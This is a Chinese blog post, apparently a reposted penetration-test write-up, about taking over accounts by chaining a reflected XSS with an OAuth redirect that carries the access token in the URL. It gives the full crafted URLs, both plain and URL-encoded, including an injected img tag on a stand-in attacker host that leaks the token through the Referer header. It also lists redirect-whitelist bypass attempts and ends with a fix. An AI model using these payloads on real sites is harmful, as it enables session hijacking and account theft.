看我如何利用xss漏洞成功劫持账户

深碍√TFBOYSˉ_ 2022-01-05 04:47 244阅读 0赞

![1687995-20190516174731153-315689427.png][]

最近在渗透测试一个网站，其中遇到一个有意思的漏洞，通过组合xss漏洞成功劫持账户。于是写个漏洞分析的文章，也总结一下挖掘过程中的思路。考虑到漏洞披露原则，我把该网站的域名在本文中用victim.com表示。

# 漏洞原因 #

该网站使用了 OAuth 协议作为用户登入授权机制，重定向之后会带ST参数的访问令牌用于账户认证。系统的登入流程简要如下：

https://passport.victim.com/login?RedirectUrl=https://xxx.victim.com

1、用户点击以上登入链接会进入用户的登入认证页面。

2、用户输入密码完成登入后会有一个跳转链接用于身份认证验证。

https://xxx.victim.com/?ST=token

3、服务端接收ST参数的访问令牌并设置cookie会话。

其中有一个致命的错误，会话令牌直接拼接在重定向的网址中，最终导致了账户劫持。

# 漏洞挖掘 #

我当时尝试以下链接绕过该网站的白名单设置，但都没有成功。

https://passport.victim.com/login?RedirectUrl=https://attacker.com/xxx.victim.com
    
    https://passport.victim.com/login?RedirectUrl=https://xxx.victim.com%40attacker.com
    
    https://passport.victim.com/login?RedirectUrl=https://attacker.com%23xxx.victim.com

之后我开始寻找新的突破口，经过一番查找发现了一处网页上有个反射xss漏洞。

![1687995-20190516175451868-1425574103.png][]

然后我尝试换个方式利用这个漏洞，把外部图片链接嵌入到这里：

https://hmall.victim.com/searchHotKey?keyword=test"><img/src="https://image.attacker.net/images/header/icon-src.png">

这样就可以借助Referer泄露到外部服务器。最后的漏洞利用过程如下：

https://passport.victim.com/?RedirectUrl=https://hmall.victim.com/searchHotKey?keyword=test%22%3E%3Cimg/src=%22https%3A//image.attacker.net/images/header/icon-src.png%22%3E

当受害者点击以上链接并登入之后会重定向到：

https://hmall.victim.com/searchHotKey?keyword=test"><img/src="https://image.attacker.net/images/header/icon-src.png">&ST=token

此时，浏览器会发出以下请求：

![1687995-20190516180158909-496350923.png][]

可以看到，带访问令牌的参数ST借助Referer成功泄露到攻击者服务器中，攻击者只要带上访问令牌就能成功登入受害者账户。

# 总结 #

访问令牌要用特定的域来传递接收，不能直接拼接在重定向的网站中，否则很容易被攻击者利用。

转载于:https://www.cnblogs.com/penight/p/10877019.html

[1687995-20190516174731153-315689427.png]: /images/20211230/52198873e4d04924bd1aba727ac2fa2d.png
[1687995-20190516175451868-1425574103.png]: /images/20211230/adf1c932266147f494c9ebef6cba846f.png
[1687995-20190516180158909-496350923.png]: /images/20211230/2130f28f4bf5434797334403834ceec2.png